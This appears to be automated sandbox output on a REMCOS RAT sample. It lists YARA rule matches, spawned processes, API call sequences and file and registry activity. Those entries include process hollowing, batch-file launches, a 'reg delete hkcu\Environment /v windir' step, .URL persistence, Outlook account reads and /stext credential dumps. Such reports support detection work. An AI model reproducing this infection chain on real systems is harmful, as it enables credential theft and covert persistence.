              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5800, type: MEMORYSTR

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: g4E1F7Lc2O.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\Public\Libraries\lqwhmkB.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Windows\SysWOW64\wscript.exeFile deleted: C:\Windows\SysWOW64\logagent.exeJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0041AAA07_2_0041AAA0
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004340D57_2_004340D5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004230987_2_00423098
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004112057_2_00411205
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0043820B7_2_0043820B
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004223C07_2_004223C0
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0044D3FA7_2_0044D3FA
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0043843A7_2_0043843A
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0043450A7_2_0043450A
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004195217_2_00419521
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0044B5AB7_2_0044B5AB
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004316707_2_00431670
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042E6D57_2_0042E6D5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004516E07_2_004516E0
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004337C17_2_004337C1
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004228B77_2_004228B7
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0043493F7_2_0043493F
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_004050C219_2_004050C2
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_004014AB19_2_004014AB
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_0040513319_2_00405133
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_004051A419_2_004051A4
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_0040124619_2_00401246
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_0040CA4619_2_0040CA46
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_0040523519_2_00405235
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_004032C819_2_004032C8
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_0040168919_2_00401689
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00402F6019_2_00402F60
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_0040D04420_2_0040D044
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_0040503820_2_00405038
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004050A920_2_004050A9
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_0040511A20_2_0040511A
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004051AB20_2_004051AB
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004382F320_2_004382F3
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_0043057520_2_00430575
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_0043B67120_2_0043B671
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_0041F6CD20_2_0041F6CD
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004119CF20_2_004119CF
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_00439B1120_2_00439B11
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_00438E5420_2_00438E54
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_00412F6720_2_00412F67
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_0043CF1820_2_0043CF18
              Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 0042F49E appears 37 times
              Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 00402084 appears 57 times
              Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 0042FB60 appears 34 times
              Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0041412B CreateProcessW,CloseHandle,FindCloseChangeNotification,FindCloseChangeNotification,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,7_2_0041412B
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00402CAC NtdllDefWindowProc_A,19_2_00402CAC
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00402D66 NtdllDefWindowProc_A,19_2_00402D66
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004016FC NtdllDefWindowProc_A,20_2_004016FC
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004017B6 NtdllDefWindowProc_A,20_2_004017B6
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: g4E1F7Lc2O.exeReversingLabs: Detection: 20%
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeFile read: C:\Users\user\Desktop\g4E1F7Lc2O.exeJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\g4E1F7Lc2O.exe 'C:\Users\user\Desktop\g4E1F7Lc2O.exe'
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: unknownProcess created: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
              Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh'
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn'
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz'
              Source: unknownProcess created: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe 'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs'
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' 'Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' 'Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh'Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn'Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz'Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00413958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00413958
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,19_2_00410DE1
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Bkmhwqlbkulnphubkhqeoycsyqhknoi[1]Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeFile created: C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbsJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@29/10@15/4
              Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: logagent.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_004163AD
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040D211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,7_2_0040D211
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4612:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1572:120:WilError_01
              Source: C:\Windows\SysWOW64\DpiScaling.exeMutant created: \Sessions\1\BaseNamedObjects\Octopus-GM39UT
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,19_2_0041208B
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs'
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\DpiScaling.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_0325802C push eax; ret 0_3_03258068
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_0325802C push eax; ret 0_3_03258068
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_031B545C push eax; ret 0_3_031B5498
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_031B545C push eax; ret 0_3_031B5498
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_0325802C push eax; ret 0_3_03258068
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_0325802C push eax; ret 0_3_03258068
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_031B545C push eax; ret 0_3_031B5498
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_031B545C push eax; ret 0_3_031B5498
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004510A8 push eax; ret 7_2_004510C6
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00458445 push esi; ret 7_2_0045844E
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00450786 push ecx; ret 7_2_00450799
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeCode function: 15_3_0339802C push eax; ret 15_3_03398068
